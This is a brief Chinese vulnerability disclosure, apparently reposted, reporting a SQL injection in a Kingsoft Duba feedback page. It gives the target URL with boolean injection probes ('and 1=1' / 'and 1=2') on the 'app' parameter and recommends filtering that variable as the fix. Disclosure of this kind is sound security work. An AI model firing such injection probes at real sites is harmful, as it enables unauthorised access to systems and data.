金山毒霸多个sql注入及XSS漏洞和修复脚本安全 -电脑资料

    第一个

    简要描述：由于变量过滤不严产生SQL注入漏洞 可通过入侵手段 拿到站点权限

    详细说明：http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2

    漏洞证明：http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=1

    http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=2

    结果明显不同 注入漏洞产生

    修复方案：过滤变量app